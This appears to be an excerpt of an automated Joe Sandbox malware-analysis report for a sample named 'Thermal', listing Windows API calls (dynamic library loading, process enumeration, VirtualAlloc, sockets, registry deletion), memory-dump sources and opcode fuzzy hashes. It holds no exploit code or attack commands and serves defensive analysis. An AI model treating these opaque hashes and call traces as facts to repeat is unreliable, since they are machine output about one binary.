                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 4014797782-2298589950
                                                • Opcode ID: 39f85e46cc72f6a406d49e85a64987abb11bf803a5dcdfd51e7792424f18a8c2
                                                • Instruction ID: 541886a29d7c8f606390f6cbbfee19ff7462537d608af01f45881efd92c8235b
                                                • Opcode Fuzzy Hash: 39f85e46cc72f6a406d49e85a64987abb11bf803a5dcdfd51e7792424f18a8c2
                                                • Instruction Fuzzy Hash: 29218BB160420CAFDB50DF58CC85DB737ADFB9A394B080559FA109B351CB35EC11CAA1
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007F7360
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007F7370
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007F7395
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: b1dbf78c3746b217782ad09fb1e071c81ddbf847923b9dfd7639432536d48b00
                                                • Instruction ID: 453fe0f061146c0e929433b038223514bef37dbd3456ce7fcda13e4557034629
                                                • Opcode Fuzzy Hash: b1dbf78c3746b217782ad09fb1e071c81ddbf847923b9dfd7639432536d48b00
                                                • Instruction Fuzzy Hash: 4A21CC32604118BFDF168F54CC85EBF37AAEF89764F118124FA149B290CA75AC51DBA0
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,007B027A,?), ref: 007EC6E7
                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC6F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                • API String ID: 2574300362-1816364905
                                                • Opcode ID: 201d458a5440980e2ee2fd8f40bef48817541db2512243b2162742db15d25976
                                                • Instruction ID: b298d36120eef0f6e7878e64138de2cdee962b043cf72cad33ed92e282eaae7d
                                                • Opcode Fuzzy Hash: 201d458a5440980e2ee2fd8f40bef48817541db2512243b2162742db15d25976
                                                • Instruction Fuzzy Hash: 7FE0C73C2027528FE7214B2ACC4AB427BE8FF0C308F80842AE895C2350EB78C880CF10
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00784B44,?,007849D4,?,?,007827AF,?,00000001), ref: 00784B85
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00784B97
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                • Opcode ID: 9b7d6b496cb549bbe992b3e1d0f0cb0f9c1e5ee4c434afe68d0768ff2bbdef38
                                                • Instruction ID: 0cea723b86fed6c32d78db08ddfec1fb9084667129994cdf1f5a168d77be8704
                                                • Opcode Fuzzy Hash: 9b7d6b496cb549bbe992b3e1d0f0cb0f9c1e5ee4c434afe68d0768ff2bbdef38
                                                • Instruction Fuzzy Hash: 28D017B15557238FE721AF76EC18B067AE4BF05351F11882AD496E2690EAB8E880CB50
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00784AF7,?), ref: 00784BB8
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00784BCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                • Opcode ID: 7a7e62e3900ee16bef432e75afc1776080e71b9f1de72285bd4a149bd1a7e932
                                                • Instruction ID: 2fae4dabb900f4658f7fbb9c223e82081e86bcac2dda5aef91ed051fde4746e1
                                                • Opcode Fuzzy Hash: 7a7e62e3900ee16bef432e75afc1776080e71b9f1de72285bd4a149bd1a7e932
                                                • Instruction Fuzzy Hash: 0CD017B05547238FEB20AF75EC08B067AE5BF05351F119C6AD496D2A94EAB8D880CB50
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,007F1696), ref: 007F1455
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007F1467
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: 933416adf2e7777c635ec0db6a71a758f49b0751e46e8e782034576b415b0f51
                                                • Instruction ID: 4818c3445123f9efc58cd8af426533fd17e2c98c7872bd2508393ad0485e0992
                                                • Opcode Fuzzy Hash: 933416adf2e7777c635ec0db6a71a758f49b0751e46e8e782034576b415b0f51
                                                • Instruction Fuzzy Hash: F0D01730521722CFE7209F75D80972A76E4FF56395F11C82A94E6D22A0EB78D8C0CB50
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00785E3D), ref: 007855FE
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00785610
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                • Opcode ID: 995963619c0270bb390f736bfa4acab92d1dbf669ef8c9e1951f35d6677c6da2
                                                • Instruction ID: 8d5b93e7c29d4c800e541c8b0cbc05b168a624ac0367de7f88f4f9d62c7fa1db
                                                • Opcode Fuzzy Hash: 995963619c0270bb390f736bfa4acab92d1dbf669ef8c9e1951f35d6677c6da2
                                                • Instruction Fuzzy Hash: 33D01774AA1B12CFE760AF75CC087167AE5BF05755F11882AD496D2291EA78C880CF90
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007E93DE,?,00800980), ref: 007E97D8
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007E97EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                • Opcode ID: 6d17d1718afc4aec347700b4909c47c0abbf243cd7eafc60d841c56a433baedd
                                                • Instruction ID: d4e06c467068833296e1bc5c39c108e2234382ffdfc6845fc93cd3a57ebe18e6
                                                • Opcode Fuzzy Hash: 6d17d1718afc4aec347700b4909c47c0abbf243cd7eafc60d841c56a433baedd
                                                • Instruction Fuzzy Hash: E4D012715117138FD7205F75DC8870676D4FF09391F11882AD895D2250EB78D480CA51
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 007EE7A7
                                                • CharLowerBuffW.USER32(?,?), ref: 007EE7EA
                                                  • Part of subcall function 007EDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007EDEAE
                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007EE9EA
                                                • _memmove.LIBCMT ref: 007EE9FD
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                • String ID:
                                                • API String ID: 3659485706-0
                                                • Opcode ID: 5a8d4b8f386f5100ce395229036590decbdb894da16480ef4638b2b216968b89
                                                • Instruction ID: e765216ec4f9ca4a607e7403709aa41e0fe0af70c1cbfb3e1eed6b7b4bd4d1a6
                                                • Opcode Fuzzy Hash: 5a8d4b8f386f5100ce395229036590decbdb894da16480ef4638b2b216968b89
                                                • Instruction Fuzzy Hash: CAC16871A08341CFC714DF29C48496ABBE4FF89714F04896EF8999B351D739E946CB82
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007E87AD
                                                • CoUninitialize.OLE32 ref: 007E87B8
                                                  • Part of subcall function 007FDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,007E8A0E,?,00000000), ref: 007FDF71
                                                • VariantInit.OLEAUT32(?), ref: 007E87C3
                                                • VariantClear.OLEAUT32(?), ref: 007E8A94
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                • String ID:
                                                • API String ID: 780911581-0
                                                • Opcode ID: c2d792c8ec45ea60b1f6beaa50453278df8ffba7ffa11dc5b023fab2fe458146
                                                • Instruction ID: 1172dac1823723ed9e4799e26140a218ea4e968bf1f9e792f7d7c88971ee276d
                                                • Opcode Fuzzy Hash: c2d792c8ec45ea60b1f6beaa50453278df8ffba7ffa11dc5b023fab2fe458146
                                                • Instruction Fuzzy Hash: 72A15875604B41DFCB50DF25C485B2AB7E5BF88354F148859FA999B3A2CB38ED00CB92
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8308
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8320
                                                • CLSIDFromProgID.OLE32(?,?,00000000,00800988,000000FF,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8345
                                                • _memcmp.LIBCMT ref: 007C8366
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID:
                                                • API String ID: 314563124-0
                                                • Opcode ID: f94d86fe822a54bbea3b7d88ed229ff7b64ee1a682fac84f37e36700275df3ef
                                                • Instruction ID: 38e86e68464498fa2867b9f173dca789d827fcc89b40aa2e2da876e84ed40fd0
                                                • Opcode Fuzzy Hash: f94d86fe822a54bbea3b7d88ed229ff7b64ee1a682fac84f37e36700275df3ef
                                                • Instruction Fuzzy Hash: 3D813971A00109EFCB44DF94C888EEEB7B9FF89315F20855CE516AB250DB75AE06CB61
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: fad3587e79899327a2c5170298c9c31f8ca495c784c2d6fa484d974b08e1f1fc
                                                • Instruction ID: 6bf604dd1c1721854cf71ef40a147b87327eb3f2cd097511c39f48162fe2e531
                                                • Opcode Fuzzy Hash: fad3587e79899327a2c5170298c9c31f8ca495c784c2d6fa484d974b08e1f1fc
                                                • Instruction Fuzzy Hash: E1519630608B01DADB289F79D899F2DB7E5AF44350F20981FE556DB2A2EF789840CF15
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 007EF526
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 007EF534
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • Process32NextW.KERNEL32(00000000,?), ref: 007EF5F4
                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007EF603
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                • String ID:
                                                • API String ID: 2576544623-0
                                                • Opcode ID: 8289f4e3b76002fa47891ed790cd36ba7b44dda78efe2fe8205be23584ce0260
                                                • Instruction ID: 679d4d9b84fae71abb345d24d293b315d43795cdbec32158eb7ad356a02de0e7
                                                • Opcode Fuzzy Hash: 8289f4e3b76002fa47891ed790cd36ba7b44dda78efe2fe8205be23584ce0260
                                                • Instruction Fuzzy Hash: 9E518CB1104350EFD720EF24D88AE6BB7E8FF98740F40492DF595972A1EB74A905CB92
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                • Instruction ID: 374332d67bf968dd470128744807e6bddd3587abc3916c518d5d16611e0bbfdc
                                                • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                • Instruction Fuzzy Hash: 6041B531B00706ABDF288E69E884D6F77A6EF45360B24C27DE85587650EB78ED428B44
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007CA68A
                                                • __itow.LIBCMT ref: 007CA6BB
                                                  • Part of subcall function 007CA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007CA976
                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 007CA724
                                                • __itow.LIBCMT ref: 007CA77B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow
                                                • String ID:
                                                • API String ID: 3379773720-0
                                                • Opcode ID: 894a4c8fc2e06a31772f27456ee94fdfbe0271198c1bb6ecc99482c95a33e0ca
                                                • Instruction ID: 3d50ef3c217e30aa3c2a74854b38cf2a4a6bba96eb9ed5db4b403dd3ac604120
                                                • Opcode Fuzzy Hash: 894a4c8fc2e06a31772f27456ee94fdfbe0271198c1bb6ecc99482c95a33e0ca
                                                • Instruction Fuzzy Hash: 99419E70A4020CABDF10EF54C84AFEE7BB9EF48755F44006DF905A3281DB789A45CBA2
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 007E70BC
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E70CC
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007E7130
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E713C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                • String ID:
                                                • API String ID: 2214342067-0
                                                • Opcode ID: b74db70ecf1c376c0e31fb0260ea1a0a8e55e50df3589e12b2d93b13390eec35
                                                • Instruction ID: 5be08b5e75b51e4d42974ea1592303bccfdd89d97ea2c01bc75c49931ad33bf5
                                                • Opcode Fuzzy Hash: b74db70ecf1c376c0e31fb0260ea1a0a8e55e50df3589e12b2d93b13390eec35
                                                • Instruction Fuzzy Hash: FF41A071740200EFEB24AF24DC8AF2A77A4EB48B54F14C458FA599B3C2DB789C018B91
                                                APIs
                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00800980), ref: 007E6B92
                                                • _strlen.LIBCMT ref: 007E6BC4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID:
                                                • API String ID: 4218353326-0
                                                • Opcode ID: 5238b2d9fb95f0200bc44b5db80bc90a7bf82befc7abcf70955ad55e45839c81
                                                • Instruction ID: 14fe7995c5476f0ac637a27850c8c08175fa36dc24ae6d77e0ec607e9806ba31
                                                • Opcode Fuzzy Hash: 5238b2d9fb95f0200bc44b5db80bc90a7bf82befc7abcf70955ad55e45839c81
                                                • Instruction Fuzzy Hash: A641D671601144EBCB04FB65DC99FBEB3A9EF68350F248155F91A97292DF38AD01CB60
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007F8F03
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: c63a13a9907c8a12a080d3adbc4e0382371b0ae4dedf975f0c019e550bb8e256
                                                • Instruction ID: 7aa7f90cf277ab344e28cd42b57090c28fb1e3d22f0dce39d220e5e1a4d6ac7d
                                                • Opcode Fuzzy Hash: c63a13a9907c8a12a080d3adbc4e0382371b0ae4dedf975f0c019e550bb8e256
                                                • Instruction Fuzzy Hash: AA31BC3061420DEEEFA09B18CC49BB837E6FB06320F144911FB51E63A1CF79EA509A52
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 007FB1D2
                                                • GetWindowRect.USER32(?,?), ref: 007FB248
                                                • PtInRect.USER32(?,?,007FC6BC), ref: 007FB258
                                                • MessageBeep.USER32(00000000), ref: 007FB2C9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
